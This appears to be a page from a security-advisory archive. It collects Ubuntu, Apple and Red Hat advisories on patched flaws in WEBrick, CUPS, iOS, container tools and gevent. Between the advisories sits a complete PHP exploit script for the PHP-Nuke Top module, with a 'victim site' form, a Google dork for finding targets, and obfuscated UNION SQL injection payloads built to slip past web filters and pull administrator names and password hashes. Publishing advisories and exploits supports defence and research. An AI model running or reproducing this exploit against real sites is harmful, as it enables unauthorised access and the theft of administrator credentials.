Ubuntu Security Notice 7057-1 - It was discovered that WEBrick incorrectly handled having both a Content- Length header and a Transfer-Encoding header. A remote attacker could possibly use this issue to perform a HTTP request smuggling attack.

    ==========================================================================Ubuntu Security Notice USN-7057-1October 07, 2024ruby-webrick vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:WEBrick could allow a HTTP request smuggling attack.Software Description:- ruby-webrick: HTTP server toolkit in RubyDetails:It was discovered that WEBrick incorrectly handled having both a Content-Length header and a Transfer-Encoding header. A remote attacker couldpossibly use this issue to perform a HTTP request smuggling attack.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  ruby-webrick                    1.8.1-1ubuntu0.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7057-1  CVE-2024-47220Package Information:  https://launchpad.net/ubuntu/+source/ruby-webrick/1.8.1-1ubuntu0.1

Ubuntu Security Notice USN-7057-1

Ubuntu Security Notice 7043-3 - USN-7043-1 fixed a vulnerability in cups-filters. This update provides the corresponding update for Ubuntu 16.04 LTS Simone Margaritelli discovered that the cups-filters cups-browsed component could be used to create arbitrary printers from outside the local network. In combination with issues in other printing components, a remote attacker could possibly use this issue to connect to a system, created manipulated PPD files, and execute arbitrary code when a printer is used. This update disables support for the legacy CUPS printer discovery protocol.

    ==========================================================================Ubuntu Security Notice USN-7043-3October 07, 2024cups-filters vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTSSummary:cups-filters could be made to run programs if it received specially craftednetwork traffic.Software Description:- cups-filters: OpenPrinting CUPS FiltersDetails:USN-7043-1 fixed a vulnerability in cups-filters. This update providesthe corresponding update for Ubuntu 16.04 LTSOriginal advisory details: Simone Margaritelli discovered that the cups-filters cups-browsed component could be used to create arbitrary printers from outside the local network. In combination with issues in other printing components, a remote attacker could possibly use this issue to connect to a system, created manipulated PPD files, and execute arbitrary code when a printer is used. This update disables support for the legacy CUPS printer discovery protocol. (CVE-2024-47176)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS  cups-browsed                    1.8.3-2ubuntu3.5+esm2                                  Available with Ubuntu Pro  cups-filters                    1.8.3-2ubuntu3.5+esm2                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7043-3  https://ubuntu.com/security/notices/USN-7043-2  https://ubuntu.com/security/notices/USN-7043-1  CVE-2024-47176

Ubuntu Security Notice USN-7043-3

Ubuntu Security Notice 7041-3 - USN-7041-1 fixed a vulnerability in CUPS. This update provides the corresponding update for Ubuntu 16.04 LTS. Simone Margaritelli discovered that CUPS incorrectly sanitized IPP data when creating PPD files. A remote attacker could possibly use this issue to manipulate PPD files and execute arbitrary code when a printer is used.

==========================================================================  
Ubuntu Security Notice USN-7041-3  
October 07, 2024

cups vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS

Summary:

CUPS could be made to crash or run programs if it received specially  
crafted network traffic.

Software Description:  
- cups: Common UNIX Printing System(tm)

Details:

USN-7041-1 fixed a vulnerability in CUPS. This update provides  
the corresponding update for Ubuntu 16.04 LTS.

Original advisory details:

 Simone Margaritelli discovered that CUPS incorrectly sanitized IPP  
 data when creating PPD files. A remote attacker could possibly use this  
 issue to manipulate PPD files and execute arbitrary code when a printer is  
 used.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS  
  cups                            2.1.3-4ubuntu0.11+esm8  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7041-3  
  https://ubuntu.com/security/notices/USN-7041-2  
  https://ubuntu.com/security/notices/USN-7041-1  
  CVE-2024-47175

Ubuntu Security Notice USN-7041-3

Apple Security Advisory 10-03-2024-1 - iOS 18.0.1 and iPadOS 18.0.1 addresses an audio capturing issue and a logic issue related to passwords being read aloud.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1

iOS 18.0.1 and iPadOS 18.0.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121373.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Media Session  
Available for: iPhone 16 (all models)  
Impact: Audio messages in Messages may be able to capture a few seconds  
of audio before the microphone indicator is activated  
Description: This issue was addressed with improved checks.  
CVE-2024-44207: Michael Jimenez and an anonymous researcher

Passwords  
Available for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch  
3rd generation and later, iPad Pro 11-inch 1st generation and later,  
iPad Air 3rd generation and later, iPad 7th generation and later, and  
iPad mini 5th generation and later  
Impact: A user's saved passwords may be read aloud by VoiceOver  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44204: Bistrit Dahal

This update is available through iTunes and Software Update on your  
iOS device, and will not appear in your computer's Software Update  
application, or in the Apple Downloads site. Make sure you have an  
Internet connection and have installed the latest version of iTunes  
from https://www.apple.com/itunes/

iTunes and Software Update on the device will automatically check  
Apple's update server on its weekly schedule. When an update is  
detected, it is downloaded and the option to be installed is  
presented to the user when the iOS device is docked. We recommend  
applying the update immediately if possible. Selecting  
Don't Install will present the option the next time you connect  
your iOS device.

The automatic update process may take up to a week depending on  
the day that iTunes or the device checks for updates. You may  
manually obtain the update via the Check for Updates button  
within iTunes, or the Software Update on your device.

To check that the iPhone, iPod touch, or iPad has been updated:

* Navigate to Settings  
* Select General  
* Select About. The version after applying this update will be  
"iOS 18.0.1 and iPadOS 18.0.1".

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmb/LLMACgkQX+5d1TXa  
Ivp/oBAAtCfF765M4s/Iwi15gaFUFbOe5Droq7gCJEvtwSsfYFESbM5eCiGZjn4y  
Na+d9SrlgymDhIz5j6ZDZdSHKjCLhlkYc+JxpjgUM7rPxJtpn1QBGdDcjUfhpesV  
sPxIaQk3lok4uLdBt9tbDT1a+pI67vKa2hm3FmZHsj5MZLSUJaR3d5rq2MWo3RjD  
dfVsDhdCvnhk0vSA7ro8/EXVX1W6Jq8UQRGMjXcZgTiSWIx4TLdx6cNGD53dPuzl  
ffP6M4XHi247tolr8gs0+EBBlnwUVF1DGgx5MZGuxO++MNLo0SF25HTZN6bmuEQy  
zcQjuOHUzEazRzs9lO6IqAoY+YFQKW/UN3+Fj0RNKl2OXloRf2DTgl1C53V+uVyB  
MdtJtYCJ1YxwKnhzGsmjclk5oqUrtEKL4Yeri1TxbfXBgoFflNLNRgRrwqkIoPKy  
XURcpZ7/yD62Y4uMDIXFWV6FlEPZ/lPnM9Yh7Nh3ocJwJFlsHItuhJrwgyjLkfCZ  
Lnerb7en4FbxEfewnjbdCh06P58e5c3XVVSVGNwIyIxeoTO7lT7E7V9tcaSi1L9s  
QYN5+zcssTumEdbns6mwivpES16Z+4LuQZfgcfynreLZA6B7LHgqXEmSDcujF8SC  
P4hiBFqyccXGrvTR47fGf8+6JPnErrFKOBEcfEu7NUYW8smtxM0=  
=n+NZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-03-2024-1

The Top module for PHP-Nuke versions 6.x and below 7.6 suffers from a remote SQL injection vulnerability.

# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass )# Google Dork: intext: Powered by PHP-Nuke# Date: 2024-10-07# Exploit Author: Emiliano Febbi# Vendor Homepage: https://phpnuke.org/# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/# Version: 6.x < 7.6# Tested on: Windows 10[code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage.<?phpecho '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center><body bgcolor="black"><body link="yellow"><pre>new exploit concept#######################################################################This exploit is for Top Module of PHP-Nuke 6.x < 7.6 ##auto-bypass *illegal operation* , *mod security* , *NukeSentinel* ##allowed http and https protocols. Code by Emiliano Febbi #######################################################################</pre><form action="'.$SERVER[PHP_SELF].'" method="POST">~ insert victim site ~ (*the folder must be specified) <input type="text" name="victim" value="http://www.site.com"> <label for="dlt">++method++</label><select name="exploit_nuke" id="lang"><option value="one">#1</option><option value="two">#2</option></select> <input type="submit" value="launch!"/> </form></body></html>';if($_POST['victim']) { $site = $_POST['victim']; $j = $_POST['exploit_nuke']; switch ($j) { /*#method1*/ case "one": /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a> "; else echo "~missing Admin Login "; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active! "; else echo "#Top Module not Active! "; print '-------------------------------------- '; /*#Get user1*/ print "#user1: "; $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user); $comment_user=explode("</a>",$comment_user[1]); var_dump(strip_tags($comment_user[0])); echo " "; /*#Get pwd1*/ print "#password1: "; $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment=explode('<a href="modules.php?name=Surveys&pollID=1">',$content); $comment=explode("</a>",$comment[1]); var_dump(strip_tags($comment[0])); echo " "; /*#Get user2*/ print "#user2: "; $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user2); $comment_user2=explode("</a>",$comment_user2[2]); var_dump(strip_tags($comment_user2[0])); echo " "; /*#Get pwd2*/ print "#password2: "; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content2); $comment2=explode("</a>",$comment2[2]); var_dump(strip_tags($comment2[0])); echo " "; break;/*###################################################################################################################################*/ case "two": /*#method2*/ /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a> "; else echo "~missing Admin Login "; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active! "; else echo "#Top Module not Active! "; print '-------------------------------------- '; /*#Get user1*/ print "#user1: "; $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userj=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userj); $comment_userj=explode("</a>",$comment_userj[1]); var_dump(strip_tags($comment_userj[0])); echo " "; /*#Get pwd1*/ print "#password1: "; $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userp=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userp); $comment_userp=explode("</a>",$comment_userp[1]); var_dump(strip_tags($comment_userp[0])); echo " "; /*#Get user2*/ print "#user2: "; $content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userz=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userz); $comment_userz=explode("</a>",$comment_userz[2]); var_dump(strip_tags($comment_userz[0])); echo " "; /*#Get pwd2*/ print "#password2: "; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userq=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userq); $comment_userq=explode("</a>",$comment_userq[2]); var_dump(strip_tags($comment_userq[0])); echo " "; break; };; };;;?>[/code]

PHP-Nuke Top Module SQL Injection

Red Hat Security Advisory 2024-7794-03 - An update for skopeo is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7794.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: skopeo security updateAdvisory ID:        RHSA-2024:7794-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7794Issue date:         2024-10-08Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for skopeo is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7794-03

Red Hat Security Advisory 2024-7793-03 - An update for buildah is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7793.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: buildah security updateAdvisory ID:        RHSA-2024:7793-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7793Issue date:         2024-10-08Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for buildah is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7793-03

Red Hat Security Advisory 2024-7792-03 - An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7792.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: containernetworking-plugins security updateAdvisory ID:        RHSA-2024:7792-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7792Issue date:         2024-10-08Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for containernetworking-plugins is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7792-03

Red Hat Security Advisory 2024-7791-03 - An update for podman is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7791.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: podman security updateAdvisory ID:        RHSA-2024:7791-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7791Issue date:         2024-10-08Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for podman is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7791-03

Red Hat Security Advisory 2024-7785-03 - An update for python-gevent is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7785.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-gevent security updateAdvisory ID:        RHSA-2024:7785-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7785Issue date:         2024-10-08Revision:           03CVE Names:          CVE-2023-41419====================================================================Summary: An update for python-gevent is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of libevent event loop.  Features include:    * convenient API around greenlets   * familiar synchronization primitives (gevent.event, gevent.queue)   * socket module that cooperates   * WSGI server on top of libevent-http   * DNS requests done through libevent-dns   * monkey patching utility to get pure Python modules to cooperateSecurity Fix(es):* python-gevent: privilege escalation via a crafted script to the WSGIServer component (CVE-2023-41419)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-41419References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2240651

Latest News